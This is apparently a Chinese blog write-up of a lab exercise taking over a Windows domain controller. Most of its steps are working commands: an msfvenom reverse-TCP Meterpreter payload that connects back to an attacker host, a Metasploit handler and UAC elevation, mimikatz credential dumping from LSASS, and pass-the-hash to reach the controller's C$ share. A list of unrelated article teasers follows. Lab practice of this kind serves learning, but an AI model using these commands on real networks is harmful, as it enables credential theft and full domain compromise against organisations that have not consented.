使用mimikata获取域控权限(无免杀)

一、实验环境

windows 7 ip:192.168.1.3 (域内普通用户,有本地管理员权限,但不知明文密码)
windows server 2012 ip:192.168.1.1 (DC域控,与server2012管理员密码相同,但不知明文密码)

二、准备工作

1、使用模块生成木马文件

msfvenom -p  windows/x64/meterpreter/reverse_tcp lhost=192.168.200.14 lport=1234 -f exe -o shell.exe

开启服务

1707183496_65c18d883d601e64a9b44.png!small?1707183497210

2、访问http://192.168.200.14:8000点击shell文件下载(也可以直接)

1707183507_65c18d936419e811f264d.png!small?1707183508306

3、在kali中使用监听模块,输入use exploit/multi/handler进入到监听模块

设置本地IP地址和监听端口

1707183516_65c18d9cc1737bffb62b1.png!small?1707183517898

4、设置payload并且运行

回到window7中,运行刚刚下载的shell文件,在kali中可以看到成功连接,shell之后更改编码,看到当前用户是普通用户

1707183526_65c18da6528eb7ae9d662.png!small?1707183527697

5、接着输入exit退出终端然后输入background将监听挂载在后台

列出当前全部会话,并且使用其中一个会话之后,构建一个exploit/windows\local\ask的会话,将当前会话应用

注意:本提权方式旨在****提高程序运行级别(exploit/windows\local\ask

利用高权限的方式去重启一个session,并不是真正意义上的提权,并未真去绕过用户的完全控制权限,会触发UAC,当用户点击之后才会出现新的高权限的session

目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个高权限shell。

1707183534_65c18dae84d1068e550fa.png!small?1707183536434

6、需要设置一个名为pingtunnel.exe的通道

1707183545_65c18db9006dc25ccecec.png!small?1707183546056

1707183551_65c18dbfca17a82fc65d4.png!small?1707183552847

提权失败

1707183561_65c18dc97264ca28d88a3.png!small?1707183562743

从提权时报错信息来看,可能是命名错误,将从新执行一遍

1707183570_65c18dd211a1e59e33366.png!small?1707183571178

后续工作就是提升权限至system权限

第一步、提权成功

(用后门得到权限,使用getuid命令查看当前用户权限是否为system,可以用getsystem进行提权,因为mimikatz要system权限)

此时,你已经拿下了域内一台机器windows 7

1707183581_65c18ddd8e6b5a77493fe.png!small?1707183582718

1707183587_65c18de39edff1c20bf3b.png!small?1707183588537第二步、输入输入privilege::debug 提升权限

1707183595_65c18debcae71f2107d81.png!small?1707183597263

第三步:输入inject::process lsass.exe sekurlsa.dll 将sekurlsa.dll 注入到lsass.exe 中(可以不用输入)

1707183602_65c18df2e17ee2da02aae.png!small?1707183604682

1707183610_65c18dfa240acaefe50ca.png!small?1707183611482

第四步、输入sekurlsa::logonPasswords full 即可获取hash和当前用户的明文密码

1707183619_65c18e032f257712dee5e.png!small?1707183620049

三、使用mimikatz利用哈希传递攻击,获取域控权限

攻击机:win7

sekurlsa::pth /user:administrator /domain:域控IP /ntlm:域控的hash值

1707183627_65c18e0b2641f724e9dc5.png!small?1707183628532成功打开另外一个cmd

在新的cmd命令行中输入**dir \192.168.1.1\c$**即可查看目标机器内容

读取win7的C盘以及文件内容的方式
dir \\192.168.3.133\C$
type \\192.168.3.133\C$\xxx.txt

当前目录下便是DC下的目录

1707183641_65c18e1997e7a445a0a99.png!small?1707183642450

本文是作者在初学内网中的一个案例实践,逻辑方面可能会有问题,但方法应该不会有误,若本文能有帮助及供各位参考的地方,不胜荣幸。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/2812586.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

一文读懂 Python 值传递和引用传递

文章目录 版本前言形参和实参值传递和引用传递Python 变量存储值语义和引用语义值语义引用语义 探讨 Python 值传递和引用传递不可变(immutable)类型可变(mutable)类型案例一案例二 拓展:不可变类型真的不可变&#xf…

基于Java SSM框架实现家庭食谱管理系统项目【项目源码+论文说明】

基于java的SSM框架实现家庭食谱管理系统演示 摘要 本论文主要论述了如何使用JAVA语言开发一个家庭食谱管理系统 ,本系统将严格按照软件开发流程进行各个阶段的工作,采用B/S架构,面向对象编程思想进行项目开发。在引言中,作者将论…

大数据可视化的设计规范,全面剖析,很实用。

大数据可视化的设计规范需要考虑到数据量大、复杂度高、数据类型多样等特点。以下是一份常见的大数据可视化设计规范,供您参考: 设计原则 简单易用:保证用户操作简单、直观,降低用户认知负担。数据准确:保证数据准确…

如何保护企业免受人工智能网络钓鱼攻击

文章目录 前言一、生成式人工智能带来了新的网络安全威胁二、人工智能将使网络钓鱼攻击变得更加危险三、企业如何阻止人工智能驱动的网络钓鱼四、网络钓鱼模拟确保责任感和适应性前言 网络钓鱼是网络犯罪分子社会工程武器库中的超级武器。网络钓鱼尤其危险,因为它是网络犯罪分…

力扣经典题目解析--搜索二维矩阵(小米一面)

原题地址: . - 力扣(LeetCode) 给你一个满足下述两条属性的 m x n 整数矩阵: 每行中的整数从左到右按非严格递增顺序排列。每行的第一个整数大于前一行的最后一个整数。 给你一个整数 target ,如果 target 在矩阵中&#xff0c…

一键生成values-sw<N>dp文件夹插件

插件名&#xff1a;SmallestWidth Dimens&#xff0c;可在AS插件中搜索安装 安装插件后&#xff0c;可使用快捷键ALTP或者在Tools|SmallestWidth 启动插件 插件启动后可自主选择要在那个moudel下生成values-sw<N>dp文件夹&#xff0c;默认有一些文件夹&#xff0c;你也…

Day 2.exec函数族和线程的基本概念、相关函数接口

exec函数族 extern char **environ; int execl(const char *path, const char *arg, ... /* (char *) NULL */); int execlp(const char *file, const char *arg, ... /* (char *) NULL */); int execle(const…

无人艇军事应用展望与思考

源自&#xff1a;《远望要报》 作者&#xff1a;赵国安 “人工智能技术与咨询” 发布 一、无人艇作战使用场景 二、军用无人艇的发展趋势 三、军用无人艇的关键技术 四、世界主要国家无人艇发展动态 结束语 声明:公众号转载的文章及图片出于非商业性的教育和科研目的供大家参…

Vue概念详解【目录】

本专栏简介&#xff1a; 这个专栏是关于 Vue2 和 Vue3 各种概念的大集合&#xff01;它深入挖掘原理&#xff0c;分析各种优势和劣势&#xff0c;适配各种应用场景&#xff0c;部分内容还列出了代码示例&#xff0c;以清晰地讲述原理。在这里&#xff0c;你将全面了解 Vue2 和…

集团机构组网

在数字化转型的浪潮中&#xff0c;企业网络需求日益复杂化&#xff0c;尤其是对于大规模的集团机构来说&#xff0c;高效、安全且可靠的网络连接成为了业务发展的关键。传统网络架构已难以满足这些需求&#xff0c;而SD-WAN&#xff08;软件定义广域网&#xff09;技术的崛起&a…

四川易点慧电子商务有限公司抖音小店:可靠的新零售典范

随着电子商务的迅猛发展和社交媒体的广泛普及&#xff0c;越来越多的消费者选择在网上购物。在这个背景下&#xff0c;四川易点慧电子商务有限公司以其独特的商业模式和强大的供应链整合能力&#xff0c;在抖音小店平台上崭露头角&#xff0c;成为了一个值得信赖的购物新选择。…

提高办公效率:Excel在文秘与行政办公中的应用技巧

&#x1f482; 个人网站:【 海拥】【神级代码资源网站】【办公神器】&#x1f91f; 基于Web端打造的&#xff1a;&#x1f449;轻量化工具创作平台&#x1f485; 想寻找共同学习交流的小伙伴&#xff0c;请点击【全栈技术交流群】 在当今信息化时代&#xff0c;Excel作为一款常…

Python算法题集_全排列

Python算法题集_全排列 题46&#xff1a;全排列1. 示例说明2. 题目解析- 题意分解- 优化思路- 测量工具 3. 代码展开1) 标准求解【标记数组递归】2) 改进版一【指针递归】3) 改进版二【高效迭代模块】4) 改进版三【高效迭代模块极简代码】 4. 最优算法5. 相关资源 本文为Python…

B树和MySql索引

1.什么是B树 它是一种平衡得多叉树&#xff0c;称为B树&#xff0c;一颗M阶的B树&#xff0c;是一颗平衡的M路的多叉树&#xff0c;可以是空树或者满足一下性质&#xff1a; 根节点至少有两个孩子。每个节点都包含k-1个关键字和K个孩子&#xff0c;其中 ceil(m/2) ≤ k ≤ m …

安泰超声功率放大器技术参数有哪些

超声功率放大器是一种用于放大超声信号的设备&#xff0c;而超声功率放大器的技术参数对于设备的性能和应用场景起着重要作用。在本文中&#xff0c;我们将介绍一些常见的超声功率放大器的技术参数。 功率输出&#xff1a;超声功率放大器的功率输出是指放大器能够输出的最大功率…

【Android移动开发】Windows10平台安装Android Studio与人工智能算法模型部署案例

目录 一、Android Studio下载地址二、开发环境JDK三、开始安装Android Studio四、案例展示与搭建五、人工智能算法模型移动端部署案例参考 一、Android Studio下载地址 https://developer.android.google.cn/studio/install.html 电脑配置要求&#xff1a; 下载保存在指定文…

3.Prometheus数据模型

采样时间戳 指标 指标值平凡也就两个字: 懒和惰; 成功也就两个字: 苦和勤; 优秀也就两个字: 你和我。 跟着我从0学习JAVA、spring全家桶和linux运维等知识&#xff0c;带你从懵懂少年走向人生巅峰&#xff0c;迎娶白富美&#xff01; 关注微信公众号【 IT特靠谱 】&#xff0…

Niginx介绍和安装使用

Nginx是什么&#xff1f; Nginx (engine x) 是一个高性能的HTTP和反向代理web服务器&#xff0c;同时也提供了IMAP/POP3/SMTP服务。Nginx是由伊戈尔赛索耶夫为俄罗斯访问量第二的Rambler.ru站点&#xff08;俄文&#xff1a;Рамблер&#xff09;开发的&#xff0c;第一…

你并不了解 JavaScript:作用域与闭包 - 第二版 - 第八章:模块化模式

第八章&#xff1a;模块化模式 在本章中&#xff0c;我们将通过探索所有编程中最重要的代码组织模式之一&#xff1a;模块&#xff0c;来结束本书的正文。正如我们将看到的那样&#xff0c;模块本质上是由我们已经讲过的内容构建而成&#xff1a;这是你学习词法作用域和闭包所…

k8s(5)

目录 使用Kubeadm安装k8s集群&#xff1a; 初始化操作&#xff1a; 每台主从节点&#xff1a; 升级内核&#xff1a; 所有节点安装docker &#xff1a; 所有节点安装kubeadm&#xff0c;kubelet和kubectl&#xff1a; 修改了 kubeadm-config.yaml&#xff0c;将其传输给…